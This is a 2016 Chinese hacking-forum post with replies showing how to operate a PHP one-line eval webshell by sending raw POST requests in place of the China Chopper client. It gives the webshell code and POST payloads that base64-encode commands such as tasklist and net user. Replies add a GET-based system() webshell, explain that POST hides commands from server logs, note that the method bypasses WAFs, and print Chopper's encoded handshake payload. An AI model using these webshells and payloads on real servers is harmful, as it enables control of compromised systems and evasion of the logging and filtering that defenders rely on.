一句话脱离菜刀执行命令

2016-03-28 09:37:17 36 9222 1


是否还在当心菜刀有后门导致webshell被盗?一句话就一定要在菜刀里使用?当然不是,我们完全可以模拟post包来实现一句话的执行,方法如下:
1.假设一句话为:<?php eval($_POST[cmd])?>
2.执行phpinfo()时post提交:cmd=phpinfo();



执行tasklist时,post提交:cmd=$a=dGFza2xpc3Q;$b=base64_decode($a);system($b);    (其中dGFza2xpc3Q为tasklist的base64编码,注意要删除后面的等号)



执行net user时,post提交:cmd=$a=bmV0IHVzZXI;$b=base64_decode($a);system($b);



3.其它的请自由发挥!!!
TCV=1

关于作者

loversorry22篇文章574篇回复

评论36次

要评论?请先  登录  或  注册
  • TOP1
    2016-3-28 19:36

    原来还可以这样水,学xi了

  • TOP2
    2016-3-28 09:57

    这是常识。

  • 36楼
    2020-7-14 16:34

    菜刀就是实现更多功能,写好了,什么功能传什么。不用自己输一大串。这个东西一般简单传个马,在上msf还行。另外这个真是常识,看见帖子名称,以为又有什么好东西了,结果。。。

  • 35楼
    2020-7-14 16:31

    我用菜刀,就是不想敲这几个命令

  • 34楼
    2020-7-14 16:18

    啊这...那我为啥要用菜刀呢?我不就是不想多打那几个字符

  • 33楼
    2016-4-3 07:00

    .................我还以为这是常识

  • 32楼
    2016-4-1 23:55

    很多时候 直接post 加一些php的函数 什么的执行 对于那种 防火墙 杀的太狠的地方

  • 31楼
    2016-4-1 20:53

    安全,但是比较繁琐就是

  • 30楼
    2016-4-1 19:42
    Any3ite

    直接使用system函数好么?<?php @system($_GET );?> 地址栏提交 1.php?cmd=whoami

    1

    不如post来的安全。

  • 29楼
    2016-4-1 10:32

    这种方法是可以用来过WAF的

  • 28楼
    2016-4-1 07:28

    常识+1。以前本地客户端就是pos这些秋裤的

  • 27楼
    2016-4-1 00:46

    post确实安全些

  • 26楼
    2016-3-30 21:31

    直接使用system函数好么? <?php @system($_GET [ "cmd" ] );?> 地址栏提交 1.php ?cmd=whoami

  • 25楼
    2016-3-30 14:20

    长知识了

  • 24楼
    2016-3-29 11:25

    小黑都在用火狐

  • 23楼
    2016-3-29 10:10

    晕死…………楼主是骗主题贴的吧。 下次我也整一个。

  • 22楼
    2016-3-28 23:58

    这个知识点有点老了。

  • 21楼
    2016-3-28 20:47
    iheartbeat

    菜刀只是为了提供一个便利,如果只需要执行命令的话用些命令函数也可以比如: <?php system($_POST);?>等等其他方式

    1

    嗯,在后门操作的时候,POST确实比GET安全多了。 按照GET的方式,一条命令上去,日志一清二楚。而POST从日志里只能看到你POST了某个页面,却不知道POST的内容。

  • 20楼
    2016-3-28 20:40

    抓包一看就一清二楚了。 像简单的HTTP响应、发包,收包。 一个抓包工具就彻底的明白了别人是如何做的了。 http procotol: wsprintfA(res,"%s=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%%2BfCIpOztwcmludCgieWlnZXNiIik7O2VjaG8oInw8LSIpO2RpZSgpOw%%3D%%3D",buf); https procotol: wsprintfA(res,"%s=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%%2BfCIpOztwcmludCgieWlnZXNiIik7O2VjaG8oInw8LSIpO2RpZSgpOw%%3D%%3D",buf); 当用菜刀连接php webshell的时候,首先菜刀就会向PHP页面POST一个这样的内容,看你的密码是否正确。

  • 19楼
    2016-3-28 20:24

    懂菜刀原理的人差不多都知道吧

  • 18楼
    2016-3-28 20:21

    以前那些html客户端就可以啊

  • 17楼
    2016-3-28 19:36

    原来还可以这样水,学xi了